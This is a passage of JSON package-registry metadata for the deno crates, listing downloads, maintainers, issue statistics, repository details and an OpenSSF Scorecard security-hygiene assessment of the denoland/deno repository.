.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T07:14:03.815Z","dependent_packages_count":1,"downloads":56410,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":13.654873340737215,"dependent_repos_count":13.317204097833892,"dependent_packages_count":18.15597474766567,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":9.03769840745051},"purl":"pkg:cargo/deno-x86_64-pc-windows-msvc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno-x86_64-pc-windows-msvc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno-x86_64-pc-windows-msvc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno-x86_64-pc-windows-msvc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:41.272Z","updated_at":"2022-11-07T18:29:41.272Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:41.280Z","updated_at":"2022-11-07T18:29:41.280Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":1080036,"name":"deno","ecosystem":"cargo","description":"Provides the deno executable","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":347,"first_release_published_at":"2018-09-12T19:43:32.347Z","latest_release_published_at":"2026-08-27T15:26:38.302Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-08T03:20:21.993Z","created_at":"2022-04-07T21:02:23.987Z","updated_at":"2026-09-08T22:16:13.460Z","registry_url":"https://crates.io/crates/deno/","install_command":"cargo install deno","documentation_url":"https://docs.rs/deno/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: 